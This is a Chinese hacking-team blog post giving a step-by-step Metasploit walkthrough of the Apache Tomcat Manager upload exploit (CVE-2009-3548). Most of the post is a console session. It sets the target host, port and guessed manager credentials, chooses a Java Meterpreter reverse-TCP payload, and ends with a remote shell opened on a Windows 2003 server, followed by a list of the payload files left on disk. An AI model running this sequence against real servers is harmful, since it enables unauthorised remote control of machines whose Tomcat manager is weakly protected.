注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

BT5 MSF CVE-2009-3548 Apache Tomcat Manager - Application Upload Authenticated Code Execution  

2014-08-31 01:35:32|  分类: BT5/Kali/MSF |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

BT5 MSF CVE-2009-3548 Apache Tomcat Manager - Application Upload Authenticated Code Execution  by k8team



http://www.exploit-db.com/exploits/31433/

          #  The following references refer to HP Operations Manager
          ['CVE', '2009-3843'],
          ['OSVDB', '60317'],
          ['CVE', '2009-4189'],
          ['OSVDB', '60670'],
 
          # HP Operations Dashboard
          ['CVE', '2009-4188'],
 
          # IBM Cognos Express Default user/pass
          ['BID', '38084'],
          ['CVE', '2010-0557'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],
 
          # IBM Rational Quality Manager and Test Lab Manager
          ['CVE', '2010-4094'],
          ['ZDI', '10-214'],
 
          # 'admin' password is blank in default Windows installer
          ['CVE', '2009-3548'],
          ['OSVDB', '60176'],
          ['BID', '36954'],



msf > search 2009-3548

Matching Modules
================

   Name                                     Disclosure Date          Rank       Description
   ----                                     ---------------          ----       -----------
   auxiliary/scanner/http/tomcat_mgr_login                           normal     Tomcat Application Manager Login Utility
   exploit/multi/http/tomcat_mgr_deploy     2009-11-09 00:00:00 UTC  excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload     2009-11-09 00:00:00 UTC  excellent  Apache Tomcat Manager Authenticated Upload Code Execution




msf > use exploit/multi/http/tomcat_mgr_upload


msf exploit(tomcat_mgr_upload) > set RHOST 192.168.85.169
RHOST => 192.168.85.169

msf exploit(tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080

msf exploit(tomcat_mgr_upload) > set username tomcat
username => tomcat
msf exploit(tomcat_mgr_upload) > set PASSWORD s3cret
PASSWORD => s3cret
msf exploit(tomcat_mgr_upload) > exploit


//帐号密码 并不一定是页面上提示的密码 那只是tocmat提示的例子代码
//除非程序员懒 直接复制或启用配置文件里的 才会导致所谓的默认密码

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.85.158   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse handler on 192.168.85.158:4444
[*] 192.168.85.169:8080 - Retrieving session ID and CSRF token...
[-] Exploit failed: Unable to access the Tomcat Manager
msf exploit(tomcat_mgr_upload) > set username tomcat
username => tomcat
msf exploit(tomcat_mgr_upload) > set PASSWORD s3cret
PASSWORD => s3cret
msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse handler on 192.168.85.158:4444
[*] 192.168.85.169:8080 - Retrieving session ID and CSRF token...
[-] Exploit failed: Unable to access the Tomcat Manager
msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse handler on 192.168.85.158:4444
[*] 192.168.85.169:8080 - Retrieving session ID and CSRF token...
[*] 192.168.85.169:8080 - Uploading and deploying 5LJ1THgYKYPAwebYg8FYh...
[*] 192.168.85.169:8080 - Executing 5LJ1THgYKYPAwebYg8FYh...
[*] 192.168.85.169:8080 - Undeploying 5LJ1THgYKYPAwebYg8FYh ...
[*] Sending stage (30355 bytes) to 192.168.85.169
[*] Meterpreter session 1 opened (192.168.85.158:4444 -> 192.168.85.169:1073) at 2014-06-23 11:26:11 +0800

meterpreter > sysinfo
Computer    : k82003-77562e10
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > ipconfig


成功后

会在webapps目录下 生成一个随机的war文件 然后tocmat解压war 释放以下文件

C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\web.xml
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes\metasploit
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes\metasploit.dat
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes\metasploit\Payload.class
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes\metasploit\PayloadServlet.class
  评论这张
 
阅读(892)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016